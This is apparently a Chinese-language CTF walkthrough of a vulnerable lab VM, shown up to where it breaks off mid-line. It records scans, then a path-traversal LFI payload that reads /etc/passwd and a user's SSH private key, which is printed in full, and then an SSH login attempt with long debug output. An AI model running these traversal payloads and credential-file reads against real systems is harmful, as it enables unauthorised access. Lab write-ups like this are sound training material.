![\"image-20240414162620691\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141730456.png\")
<\/div>\n
![\"image-20240414162709045\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404141730457.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 172.20.10.4 -- -A<\/code><\/pre>\nOpen 172.20.10.4:22\nOpen 172.20.10.4:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n| 3072 74:fd:f1:a7:47:5b:ad:8e:8a:31:02:fe:44:28:9f:d2 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzieRbxwfRD6zuOrOmgPocWFr6Ufu9oCqOlt\/Da5dqgRIZwctsaB6P5+6aDoCtBvFAzQXZQSMmT4GmIWR7eZ\/Obou3fBSMU4X8R+C\/VLyx1wifxNHy5LZ0+6djQX5cl5qhBseWQX3XIqPt+4DzRILCiMZSm9J8dnC0KEe14a8vkSfgV7Zn7xGOaw9R+KldazraLdT3zlzVuvjZjItIBjnA9tBorwY2u\/RgMX++HXD3uySm1qt8w+pFGI7WFd\/ktfwp3RhcdKMEYmqWhjAO3L9A9arf2vDYL9y\/t53XIs+FAOXzoBc2A5gxxVBe7sMsuQCSF0Jw0z5Qf11Zj9si\/\/6WG2KfihR7rKLEIfgeGFGvnilw88HT6sZQGTew1VpfRFLgMZTPpAOwzxlqUYIRWEEvmPrW7DGqzuY+8NpJQpiOhdjhuiS0\/SW6PfHVB\/nsNs1pWWwo\/q+HxyAAS3WjCrkd1xMf92KMs1yheQHKUGNxV\/zVuTbt9puXnVhIZGzzhsE=\n| 256 16:f0:de:51:09:ff:fc:08:a2:9a:69:a0:ad:42:a0:48 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFE+bBFz\/3QsD9M4Nt6is2iJpFKhlUCSEqpUtATmeiN6jNBE245wbyIk7h3JqOxldcKyfhn7uysTo8NG4AqhPEA=\n| 256 65:0e:ed:44:e2:3e:f0:e7:60:0c:75:93:63:95:20:56 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKxSz6doeuMiydUVbE7ZwrdP8GW46iJYY3JxJPcNuvnA\n80\/tcp open http syn-ack Apache httpd 2.4.56 ((Debian))\n| http-methods: \n|_ Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Servicio de Mantenimiento de Ordenadores\n|_http-server-header: Apache\/2.4.56 (Debian)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.4 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n\/.php (Status: 403) [Size: 276]\n\/tools (Status: 301) [Size: 310] [--> http:\/\/172.20.10.4\/tools\/]\n\/assets (Status: 301) [Size: 311] [--> http:\/\/172.20.10.4\/assets\/]\n\/.php (Status: 403) [Size: 276]\n\/server-status (Status: 403) [Size: 276]<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.4<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.4\n+ Target Hostname: 172.20.10.4\n+ Target Port: 80\n+ Start Time: 2024-04-14 04:28:46 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.56 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: a8a, size: 5fa570aaa96df, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .\n+ \/tools\/: This might be interesting.\n+ 8102 requests: 0 error(s) and 5 item(s) reported on remote host\n+ End Time: 2024-04-14 04:29:02 (GMT-4) (16 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20240414162943889\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/172.20.10.4\/tools\/<\/code><\/pre>\n<\/div><\/p>\n\u8fd9\u662f\u897f\u73ed\u7259\u8bed\uff0c\u7ffb\u8bd1\u4e3a\u4e2d\u6587\u7684\u8bdd\u662f\uff1a<\/p>\n
\n\u6b64\u9875\u9762\u4e0a\u7684\u6240\u6709\u4fe1\u606f\u90fd\u4ee5\u4fdd\u5bc6\u7ea7\u522b\u7f16\u76ee4\uff0c\u6b64\u4fe1\u606f\u4e0d\u5e94\u53d1\u9001\u6216\u5171\u4eab\u7ed9\u516c\u53f8\u7684\u4efb\u4f55\u5916\u90e8\u4ee3\u7406\u3002
\n\u8981\u505a\u7684\u4e8b\u60c5\uff1a
\n\u5c06\u56fe\u7247\u6dfb\u52a0\u5230\u4e3b\u7f51\u7ad9\u3002
\n\u6dfb\u52a0\u9ed1\u8272\u4e3b\u9898\u3002
\n\u628a\u8fd9\u9875\u7ffb\u8bd1\u6210\u82f1\u8bed\u3002<\/p>\n<\/blockquote>\n
\u67e5\u770b\u6e90\u4ee3\u7801\u53d1\u73b0\uff1a<\/p>\n
<!-- Redimensionar la imagen en check_if_exist.php?doc=keyboard.html --><\/code><\/pre>\n\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n
http:\/\/172.20.10.4\/tools\/check_if_exist.php?doc=keyboard.html<\/code><\/pre>\n<\/div><\/p>\n\n\u8fd9\u6b3e\u673a\u68b0\u952e\u76d8\u914d\u5907\u4e86Cherry MX\u5f00\u5173\u548cRGB\u80cc\u5149\uff0c\u63d0\u4f9b\u975e\u51e1\u7684\u4e66\u5199\u4f53\u9a8c\u3002\u5176\u7d27\u51d1\u7684\u8bbe\u8ba1\u548c\u575a\u56fa\u7684\u7ed3\u6784\u4f7f\u5176\u6210\u4e3a\u4efb\u4f55\u5de5\u4f5c\u7ad9\u7684\u5b8c\u7f8e\u8865\u5145\u3002<\/p>\n
Cherry MX\u4ea4\u6362\u673a\u3002
\nRGB\u80cc\u5149\u3002
\n\u7d27\u51d1\u578b\u8bbe\u8ba1\u3002
\n\u5b9e\u5fc3\u7ed3\u6784\u3002
\nUSB\u8fde\u63a5<\/p>\n<\/blockquote>\n
\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u6ca1\u4e1c\u897f\uff0c\u5c1d\u8bd5LFI\uff01<\/p>\n
http:\/\/172.20.10.4\/tools\/check_if_exist.php?doc=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:999:999:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nsystemd-coredump:x:998:998:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmessagebus:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:104:65534::\/run\/sshd:\/usr\/sbin\/nologin\ngh0st:x:1001:1001::\/home\/gh0st:\/bin\/bash<\/code><\/pre>\nhttp:\/\/172.20.10.4\/tools\/check_if_exist.php?doc=..\/..\/..\/..\/..\/home\/gh0st\/.ssh\/id_rsa<\/code><\/pre>\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC7peoQE4\nzNYwvrv72HTs4TAAAAEAAAAAEAAAGXAAAAB3NzaC1yc2EAAAADAQABAAABgQC2i1yzi3G5\nQPSlTgc\/EdnvrisIm0Z0jq4HDQJDRMaXQ4i4UdIlbEgmO\/FA17kHzY1Mzi5vJFcLUSVVcF\n1IAny5Dh8VA4t\/+LRH0EFx6ZFibYinUJacgteD0RxRAUqNOjiYayzG1hWdKsffGzKz8EjQ\n9xcBXAR9PBs6Wkhur+UptHi08QmtCWLV8XAo0DW9ATlkhSj25KiicNm+nmbEbLaK1U7U\/C\naXDHZCcdIdkZ1InLj246sovn5kFPaBBHbmez9ji11YNaHVHgEkb37bLJm95l3fkU6sRGnz\n6JlqXYnRLN84KAFssQOdFCFKqAHUPC4eg2i95KVMEW21W3Cen8UFDhGe8sl++VIUy\/nqZn\n8ev8deeEk3RXDRb6nwB3G+96BBgVKd7HCBediqzXE5mZ64f8wbimy2DmM8rfBMGQBqjocn\nxkIS7msERVerz4XfXURZDLbgBgwlcWo+f8z2RWBawVgdajm3fL8RgT7At\/KUuD7blQDOsk\nWZR8KsegciUa8AAAWQNI9mwsIPu\/OgEFaWLkQ+z0oA26f8k\/0hXZWPN9THrVFZRwGOtD8u\nutUgpP9SyHrL02jCx\/TGdypihPdUeI5ffCvXI98cnvQDzK95DSiBNkmIHu3V8+f0e\/QySN\nFU3pVI3JjB6CgSKX2SdiN+epUdtZwbynrJeEh5mh0ULqQeY1WeczfLKNRFemE6NPFc+bo7\nduQpt1I8DHPkh1UU2okfh8UoOMbkfOSLrVvB0dAaikk1RmtQs3x5CH6NhjsHOi7xDdza2A\ndWJPZ4WbvcaEIi\/vlDcjeOL285TIDqaom19O4XSrDZD70W61jM3whsicLDrupWxBUgTPqv\nFbr3D3OrQUfLMA1c\/Fbb1vqTQFcbsbApMDKm2Z4LigZad7dOYyPVToEliyzksIk7f0x3Zr\ns+o1q2FpE4iR3hQtRH2IGeGo3IZtGV6DnWgwe\/FTQWT57TNPMoUNkrW5lmo69Z2jjBBZa4\nq\/eO848T2FlGEt7fWVsuzveSsln5V+mT6QYIpWgjJcvkNzQ0lsBUEs0bzrhP1CcPZ\/dezw\noBGFvb5cnrh0RfjCa9PYoNR+d\/IuO9N+SAHhZ7k+dv4He2dAJ3SxK4V9kIgAsRLMGLZOr1\n+tFwphZ2mre\/Z\/SoT4SGNl8jmOXb6CncRLoiLgYVcGbEMJzdEY8yhBPyvX1+FCVHIHjGCU\nVCnYqZAqxkXhN0Yoc0OU+jU6vNp239HbtaKO2uEaJjE4CDbQbf8cxstd4Qy5\/MBaqrTqn6\nUWWiM+89q9O80pkOYdoeHcWLx0ORHFPxB1vb\/QUVSeWnQH9OCfE5QL51LaheoMO9n8Q5dy\nbSJnR8bjnnZiyQ0AVtFaCnHe56C4Y8sAFOtyMi9o2GKxaXObUsZt30e4etr1Fg2JNY6+Ma\nbS8K6oUcIuy+pObFzlgjXIMdiGkix\/uwT+tC2+HHyAett2bbgwuTrB3cA8bkuNpH\/sBfgf\nf5rFGDu6RpFEVyiF0R6on6dZRBTCXIymfdpj6wBo0\/uj0YpqyqFTcJpnb2fntPcVoISM7s\n5kGVU\/19fN39rtAIUa9XWk5PyI2avOYMnyeJwn3vaQ0dbbnaqckLYzLM8vyoygKFxWS3BC\n6w0TBZDqQz36sD0t0bfIeSuZamttSFP1\/pufLYtF+zaIUOsKzwwpYgUsr6iiRFKVTTv7w2\ncqM2VCavToGkI86xD9bKLU+xNnuSNbq+mtOZUodAKuON8SdW00BFOSR\/8EN7dZTKGipura\no8lsrT0XW+yZh+mlSVtuILfO5fdGKwygBrj6am1JQjOHEnmKkcIljMJwVUZE\/s4zusuH09\nKx2xMUx4WMkLSUydSvflAVA7ZH9u8hhvrgBL\/Gh5hmLZ7uckdK0smXtdtWt+sfBocVQKbk\neUs+bnjkWniqZ+ZLVKdjaAN8bIZVNqUhX6xnCauoVXDkeKl2tP7QuhqDbOLd7hoOuhLD4s\n9LVqxvFtDuRWjtwFhc25H8HsQtjKCRT7Oyzdoc98FBbbJCWdyu+gabq17\/sxR6Wfhu+Qj3\nnY2JGa230fMlBvSfjiygvXTTAr98ZqyioEUsRvWe7MZssqZDRWj8c61LWsGfDwJz\/qOoWJ\nHXTqScCV9+B+VJfoVGKZ\/bOTJ1NbMlk6+fCU1m4fA\/67NM2Y7cqXv8HXdnlWrZzTwWbqew\nRwDz5GzPiB9aiSw8gDSkgPUmbWztiSWiXlCv25p0yblMYtIYcTBLWkpK8DRkR0iShxjfLC\nTDR1WHXRNjmli\/ZlsH0Unfs0Vk\/dNpYfJoePkvKYpLEi3UFfucsQH1KyqLKQbbka82i+v\/\npD1DmNcHFVagbI9hQkYGOHON66UX0l\/LIw0inIW7CRc8z0lpkShXFBgLPeg+mvzBGOEyq6\n9tDhjVw3oagRmc3R03zfIwbPINo=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
\u79c1\u94a5ssh\u8fde\u63a5<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ vim id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ chmod 600 id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ssh gh0st@172.20.10.4 -i id_rsa \n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\nIT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!\nSomeone could be eavesdropping on you right now (man-in-the-middle attack)!\nIt is also possible that a host key has just been changed.\nThe fingerprint for the ED25519 key sent by the remote host is\nSHA256:YDW5zhbCol\/1L6a3swXHsFDV6D3tUVbC09Ch+bxLR08.\nPlease contact your system administrator.\nAdd correct host key in \/home\/kali\/.ssh\/known_hosts to get rid of this message.\nOffending ECDSA key in \/home\/kali\/.ssh\/known_hosts:18\n remove with:\n ssh-keygen -f '\/home\/kali\/.ssh\/known_hosts' -R '172.20.10.4'\nHost key for 172.20.10.4 has changed and you have requested strict checking.\nHost key verification failed.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ssh-keygen -f '\/home\/kali\/.ssh\/known_hosts' -R '172.20.10.4'\n# Host 172.20.10.4 found: line 17\n# Host 172.20.10.4 found: line 18\n\/home\/kali\/.ssh\/known_hosts updated.\nOriginal contents retained as \/home\/kali\/.ssh\/known_hosts.old\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ssh gh0st@172.20.10.4 -i id_rsa \nThe authenticity of host '172.20.10.4 (172.20.10.4)' can't be established.\nED25519 key fingerprint is SHA256:YDW5zhbCol\/1L6a3swXHsFDV6D3tUVbC09Ch+bxLR08.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '172.20.10.4' (ED25519) to the list of known hosts.\nLoad key "id_rsa": error in libcrypto\n(gh0st@172.20.10.4) Password:\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ssh gh0st@172.20.10.4 -i id_rsa -vvv\nOpenSSH_9.6p1 Debian-3, OpenSSL 3.1.4 24 Oct 2023\ndebug1: Reading configuration data \/etc\/ssh\/ssh_config\ndebug1: \/etc\/ssh\/ssh_config line 19: include \/etc\/ssh\/ssh_config.d\/*.conf matched no files\ndebug1: \/etc\/ssh\/ssh_config line 21: Applying options for *\ndebug2: resolve_canonicalize: hostname 172.20.10.4 is address\ndebug3: expanded UserKnownHostsFile '~\/.ssh\/known_hosts' -> '\/home\/kali\/.ssh\/known_hosts'\ndebug3: expanded UserKnownHostsFile '~\/.ssh\/known_hosts2' -> '\/home\/kali\/.ssh\/known_hosts2'\ndebug3: channel_clear_timeouts: clearing\ndebug3: ssh_connect_direct: entering\ndebug1: Connecting to 172.20.10.4 [172.20.10.4] port 22.\ndebug3: set_sock_tos: set socket 3 IP_TOS 0x10\ndebug1: Connection established.\ndebug1: identity file id_rsa type -1\ndebug1: identity file id_rsa-cert type -1\ndebug1: Local version string SSH-2.0-OpenSSH_9.6p1 Debian-3\ndebug1: Remote protocol version 2.0, remote software version OpenSSH_8.4p1 Debian-5+deb11u1\ndebug1: compat_banner: match: OpenSSH_8.4p1 Debian-5+deb11u1 pat OpenSSH* compat 0x04000000\ndebug2: fd 3 setting O_NONBLOCK\ndebug1: Authenticating to 172.20.10.4:22 as 'gh0st'\ndebug3: record_hostkey: found key type ED25519 in file \/home\/kali\/.ssh\/known_hosts:22\ndebug3: load_hostkeys_file: loaded 1 keys from 172.20.10.4\ndebug1: load_hostkeys: fopen \/home\/kali\/.ssh\/known_hosts2: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts2: No such file or directory\ndebug3: order_hostkeyalgs: have matching best-preference key type ssh-ed25519-cert-v01@openssh.com, using HostkeyAlgorithms verbatim\ndebug3: send packet: type 20\ndebug1: SSH2_MSG_KEXINIT sent\ndebug3: receive packet: type 20\ndebug1: SSH2_MSG_KEXINIT received\ndebug2: local client KEXINIT proposal\ndebug2: KEX algorithms: sntrup761x25519-sha512@openssh.com,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com\ndebug2: host key algorithms: ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ssh-ed25519@openssh.com,sk-ecdsa-sha2-nistp256@openssh.com,rsa-sha2-512,rsa-sha2-256\ndebug2: ciphers ctos: chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com\ndebug2: ciphers stoc: chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com\ndebug2: MACs ctos: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1\ndebug2: MACs stoc: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1\ndebug2: compression ctos: none,zlib@openssh.com,zlib\ndebug2: compression stoc: none,zlib@openssh.com,zlib\ndebug2: languages ctos: \ndebug2: languages stoc: \ndebug2: first_kex_follows 0 \ndebug2: reserved 0 \ndebug2: peer server KEXINIT proposal\ndebug2: KEX algorithms: curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256\ndebug2: host key algorithms: rsa-sha2-512,rsa-sha2-256,ssh-rsa,ecdsa-sha2-nistp256,ssh-ed25519\ndebug2: ciphers ctos: chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com\ndebug2: ciphers stoc: chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com\ndebug2: MACs ctos: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1\ndebug2: MACs stoc: umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1\ndebug2: compression ctos: none,zlib@openssh.com\ndebug2: compression stoc: none,zlib@openssh.com\ndebug2: languages ctos: \ndebug2: languages stoc: \ndebug2: first_kex_follows 0 \ndebug2: reserved 0 \ndebug1: kex: algorithm: curve25519-sha256\ndebug1: kex: host key algorithm: ssh-ed25519\ndebug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none\ndebug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none\ndebug3: send packet: type 30\ndebug1: expecting SSH2_MSG_KEX_ECDH_REPLY\ndebug3: receive packet: type 31\ndebug1: SSH2_MSG_KEX_ECDH_REPLY received\ndebug1: Server host key: ssh-ed25519 SHA256:YDW5zhbCol\/1L6a3swXHsFDV6D3tUVbC09Ch+bxLR08\ndebug3: record_hostkey: found key type ED25519 in file \/home\/kali\/.ssh\/known_hosts:22\ndebug3: load_hostkeys_file: loaded 1 keys from 172.20.10.4\ndebug1: load_hostkeys: fopen \/home\/kali\/.ssh\/known_hosts2: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts: No such file or directory\ndebug1: load_hostkeys: fopen \/etc\/ssh\/ssh_known_hosts2: No such file or directory\ndebug1: Host '172.20.10.4' is known and matches the ED25519 host key.\ndebug1: Found key in \/home\/kali\/.ssh\/known_hosts:22\ndebug3: send packet: type 21\ndebug2: ssh_set_newkeys: mode 1\ndebug1: rekey out after 134217728 blocks\ndebug1: SSH2_MSG_NEWKEYS sent\ndebug1: expecting SSH2_MSG_NEWKEYS\ndebug3: receive packet: type 21\ndebug1: SSH2_MSG_NEWKEYS received\ndebug2: ssh_set_newkeys: mode 0\ndebug1: rekey in after 134217728 blocks\ndebug3: send packet: type 5\ndebug3: receive packet: type 7\ndebug1: SSH2_MSG_EXT_INFO received\ndebug3: kex_input_ext_info: extension server-sig-algs\ndebug1: kex_ext_info_client_parse: server-sig-algs=<ssh-ed25519,sk-ssh-ed25519@openssh.com,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,webauthn-sk-ecdsa-sha2-nistp256@openssh.com>\ndebug3: receive packet: type 6\ndebug2: service_accept: ssh-userauth\ndebug1: SSH2_MSG_SERVICE_ACCEPT received\ndebug3: send packet: type 50\ndebug3: receive packet: type 51\ndebug1: Authentications that can continue: publickey,password,keyboard-interactive\ndebug3: start over, passed a different list publickey,password,keyboard-interactive\ndebug3: preferred gssapi-with-mic,publickey,keyboard-interactive,password\ndebug3: authmethod_lookup publickey\ndebug3: remaining preferred: keyboard-interactive,password\ndebug3: authmethod_is_enabled publickey\ndebug1: Next authentication method: publickey\ndebug1: Will attempt key: id_rsa explicit\ndebug2: pubkey_prepare: done\ndebug1: Trying private key: id_rsa\nLoad key "id_rsa": error in libcrypto\ndebug2: we did not send a packet, disable method\ndebug3: authmethod_lookup keyboard-interactive\ndebug3: remaining preferred: password\ndebug3: authmethod_is_enabled keyboard-interactive\ndebug1: Next authentication method: keyboard-interactive\ndebug2: userauth_kbdint\ndebug3: send packet: type 50\ndebug2: we sent a keyboard-interactive packet, wait for reply\ndebug3: receive packet: type 60\ndebug2: input_userauth_info_req: entering\ndebug2: input_userauth_info_req: num_prompts 1<\/code><\/pre>\n\u53ef\u80fd\u662f\u683c\u5f0f\u539f\u56e0\uff1f<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ rm id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ wget http:\/\/172.20.10.4\/tools\/check_if_exist.php?doc=..\/..\/..\/..\/..\/home\/gh0st\/.ssh\/id_rsa \n--2024-04-14 04:43:59-- http:\/\/172.20.10.4\/tools\/check_if_exist.php?doc=..\/..\/..\/..\/..\/home\/gh0st\/.ssh\/id_rsa\nConnecting to 172.20.10.4:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 2655 (2.6K) [text\/html]\nSaving to: \u2018check_if_exist.php?doc=..%2F..%2F..%2F..%2F..%2Fhome%2Fgh0st%2F.ssh%2Fid_rsa\u2019\ncheck_if_exist.php?doc=..%2F..%2F..%2 100%[=========================================================================>] 2.59K --.-KB\/s in 0s \n2024-04-14 04:43:59 (369 MB\/s) - \u2018check_if_exist.php?doc=..%2F..%2F..%2F..%2F..%2Fhome%2Fgh0st%2F.ssh%2Fid_rsa\u2019 saved [2655\/2655]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ head id_rsa\nhead: cannot open 'id_rsa' for reading: No such file or directory\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ls -la\ntotal 12\ndrwxr-xr-x 2 kali kali 4096 Apr 14 04:43 .\ndrwxr-xr-x 36 kali kali 4096 Apr 14 04:26 ..\n-rw-r--r-- 1 kali kali 2655 Apr 14 04:43 'check_if_exist.php?doc=..%2F..%2F..%2F..%2F..%2Fhome%2Fgh0st%2F.ssh%2Fid_rsa'\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ mv * id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ ls \nid_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Friendly2]\n\u2514\u2500$ head id_rsa \n-----BEGIN OPENSSH PRIVATE 